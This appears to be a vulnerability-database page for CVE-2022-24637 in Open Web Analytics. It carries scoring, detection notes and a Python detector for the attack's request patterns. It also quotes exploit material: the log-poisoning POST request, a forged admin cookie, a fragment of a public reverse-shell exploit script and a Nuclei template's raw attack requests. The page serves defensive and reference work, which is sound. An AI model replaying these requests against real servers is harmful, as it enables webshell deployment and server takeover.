CVE-2022-24637
Published 2022-03-18
Priority P180 · critical · CVSS 3.1 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit available · EPSS 99.13% (99.9th percentile)
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| open-web-analytics | open-web-analytics | >= 0 < 1.7.4 | 1.7.4 |
| openwebanalytics | open_web_analytics | < 1.7.4 | 1.7.4 |
Detection & IOCs (extracted from sources)
- url: /index.php?owa_do=base.optionsGeneral
- command: owa_action=base.optionsUpdate&owa_config[base.error_log_file]=owa-data/caches/<randstr>.php&owa_config[base.error_log_level]=2
- cookie: owa_p=<hash>; owa_u=admin
- Detect unauthenticated GET requests to OWA user cache PHP files matching the pattern /owa-data/caches/<int>/owa_user/<md5hash>.php; the exploit iterates these to find user credential caches.
- Detect POST requests to /index.php?owa_do=base.optionsGeneral containing owa_config[base.error_log_file] pointing to a .php file inside owa-data/caches/; this is the log-poisoning step that writes the webshell.
- Detect POST requests to /index.php?owa_do=base.optionsGeneral containing owa_config[shell] in the body; this is the step that writes the reverse-shell payload into the log file.
- Detect GET requests to /owa-data/caches/*.php; execution of a dynamically created PHP file in the cache directory indicates successful webshell deployment.
- The exploit iterates cache keys 0–99 and derives filenames via MD5 of 'user_id<N>' to locate credential cache files; alert on rapid sequential GET requests matching /owa-data/caches/[0-9]+/owa_user/[a-f0-9]{32}\.php from a single source IP.
- The NVD description notes that cache files beginning with '<?php (single-quote prefix instead of a proper PHP open tag) are not executed by PHP; detection of such files in owa-data/caches/ indicates exploitation of the cache-exposure vulnerability.
- The shell filename is randomly generated (8 random chars + .php) per exploit run, so static filename-based detection will not work; pattern-based detection on the directory path is required.
- The exploit hardcodes the log file path as /var/www/html/owa/owa-data/caches/<shell>.php; installations in non-default paths will use a different absolute path, but the relative web path owa-data/caches/ remains consistent.
- The vulnerability affects OWA versions before 1.7.4; the exploit confirms the target by checking for 'version=1.7.3' in the main page response.
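The detection notes above describe four request shapes and one behavioural signal (a burst of user-cache probes from one source). The following is an added example that turns them into a small detection pass; it is not code from the advisory sources or from the OWA project. It assumes a constructed JSON-lines request log with fields ts, src, method, path and body (a proxy or WAF that records POST bodies; plain web-server access logs lack the body, so only the GET-based checks apply to them), and the burst threshold and window are assumptions to be tuned per site.

```python
"""Detection pass for the CVE-2022-24637 request patterns (constructed example).

Input: JSON-lines records with fields ts, src, method, path, body. The body
field is assumed to come from a proxy/WAF that logs POST bodies.
"""
import json
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Request shapes taken from the detection notes.
USER_CACHE_RE = re.compile(r"^/owa-data/caches/\d+/owa_user/[a-f0-9]{32}\.php$")
CACHE_PHP_RE = re.compile(r"^/owa-data/caches/[^/]+\.php$")
OPTIONS_PATH = "/index.php?owa_do=base.optionsGeneral"
LOG_FILE_RE = re.compile(r"owa_config\[base\.error_log_file\]=[^&]*owa-data/caches/[^&]*\.php")
SHELL_KEY_RE = re.compile(r"owa_config\[shell\]=")

# Burst thresholds are assumptions; tune them to the site's normal traffic.
BURST_COUNT = 5
BURST_WINDOW = timedelta(seconds=60)


def classify(rec):
    """Return the labels that apply to one request record."""
    labels = []
    method, path = rec["method"], rec["path"]
    # Bodies are logged URL-encoded; decode so the bracketed keys match.
    body = unquote_plus(rec.get("body", ""))
    if method == "GET" and USER_CACHE_RE.match(path):
        labels.append("user_cache_probe")
    elif method == "GET" and CACHE_PHP_RE.match(path):
        labels.append("cache_php_execution")
    if method == "POST" and path == OPTIONS_PATH:
        if LOG_FILE_RE.search(body):
            labels.append("log_path_poisoning")
        if SHELL_KEY_RE.search(body):
            labels.append("shell_payload_write")
    return labels


def analyze(lines):
    """Classify each record and flag sources that probe user caches in a burst."""
    findings = []
    bursts = []
    recent = defaultdict(deque)  # src -> timestamps of recent user-cache probes
    for line in lines:
        rec = json.loads(line)
        ts = datetime.fromisoformat(rec["ts"])
        labels = classify(rec)
        for label in labels:
            findings.append((rec["src"], label, rec["path"]))
        if "user_cache_probe" in labels:
            window = recent[rec["src"]]
            window.append(ts)
            while ts - window[0] > BURST_WINDOW:
                window.popleft()
            if len(window) >= BURST_COUNT and rec["src"] not in bursts:
                bursts.append(rec["src"])
    return {"findings": findings, "bursts": bursts}


def sample_log():
    """Constructed request records covering each stage plus benign traffic."""
    att, other = "198.51.100.7", "203.0.113.5"
    recs = [
        {"ts": "2022-09-01T10:00:00", "src": other, "method": "GET", "path": "/index.php", "body": ""},
        # A single cache probe from another source: flagged, but not a burst.
        {"ts": "2022-09-01T10:00:05", "src": other, "method": "GET",
         "path": "/owa-data/caches/3/owa_user/" + "1" * 32 + ".php", "body": ""},
    ]
    # Six probes within six seconds from one source (constructed hash values).
    for n in range(6):
        recs.append({"ts": f"2022-09-01T10:01:{n:02d}", "src": att, "method": "GET",
                     "path": f"/owa-data/caches/{n}/owa_user/{n:032x}.php", "body": ""})
    recs += [
        {"ts": "2022-09-01T10:02:00", "src": att, "method": "POST", "path": OPTIONS_PATH,
         "body": "owa_action=base.optionsUpdate&owa_config%5Bbase.error_log_file%5D="
                 "owa-data%2Fcaches%2Fabcdefgh.php&owa_config%5Bbase.error_log_level%5D=2"},
        {"ts": "2022-09-01T10:02:05", "src": att, "method": "POST", "path": OPTIONS_PATH,
         "body": "owa_action=base.optionsUpdate&owa_config%5Bshell%5D=PLACEHOLDER"},
        {"ts": "2022-09-01T10:02:10", "src": att, "method": "GET",
         "path": "/owa-data/caches/abcdefgh.php", "body": ""},
    ]
    return [json.dumps(r) for r in recs]


if __name__ == "__main__":
    result = analyze(sample_log())
    for src, label, path in result["findings"]:
        print(f"{src} {label} {path}")
    print("enumeration bursts:", result["bursts"])
```

The path match is anchored on the directory layout rather than the file name, since the notes point out that the shell name is random per run; the body is URL-decoded before matching so that the bracketed owa_config keys are found whether the proxy logged them raw or encoded.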
CVSS provenance
- NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 5.0 MEDIUM, AV:N/AC:L/Au:N/C:P/I:N/A:N
OSV
Improper Privilege Management in Open Web Analytics (osv · 2022-03-19): CVE-2022-24637 [CRITICAL]
GHSA
Improper Privilege Management in Open Web Analytics (ghsa · 2022-03-19): CVE-2022-24637 [CRITICAL], CWE-269
No detection rules found.
Exploit-DB
Open Web Analytics 1.7.3 - Remote Code Execution (exploitdb · 2022-11-11 · CVSS 9.8): CVE-2022-24637 [CRITICAL]
Excerpt of the indexed exploit file (truncated by extraction):

```python
# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
# Date: 2022-08-30
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://www.openwebanalytics.com/
# Software Link: https://github.com/Open-Web-Analytics
# Version: $sock, 1=>$sock, 2=>$sock),$pipes);?>'
shell_filename = get_random_string(8) + '.php'
shell_url = base_url + 'owa-data/caches/' + shell_filename
if args.proxy:
    proxy_url = get_normalized_url(args.proxy)
    proxy_protocol = get_proxy_protocol(proxy_url)
    proxies = { proxy_protocol: proxy_url }
else:
    proxies = {}
session = requests.Session()
try:
    mainpage_request = session.get(base_url, proxies=proxies)
except Exception as e:
    print_message('Could not connect to "' + base_url, "ERROR")
    exit()
else:
    print
```
Nuclei
Open Web Analytics 1.7.3 - Remote Code Execution (nuclei · CVSS 9.8): CVE-2022-24637 [CRITICAL]
Template excerpt (truncated by extraction):

```yaml
    matchers:
      - type: word
        part: body
        words:
          - '
  - raw:
      - |
        POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
        Host: {{Hostname}}
        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
        Content-Type: application/x-www-form-urlencoded

        owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2
  - raw:
      - |
        POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
        Host: {{Hostname}}
        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
        Content-Type: appli
```
Metasploit
Open Web Analytics 1.7.3 - Remote Code Execution (RCE) (metasploit)
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/169811/Open-Web-Analytics-1.7.3-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/171389/Open-Web-Analytics-1.7.3-Remote-Code-Execution.html
- https://devel0pment.de/?p=2494
- https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4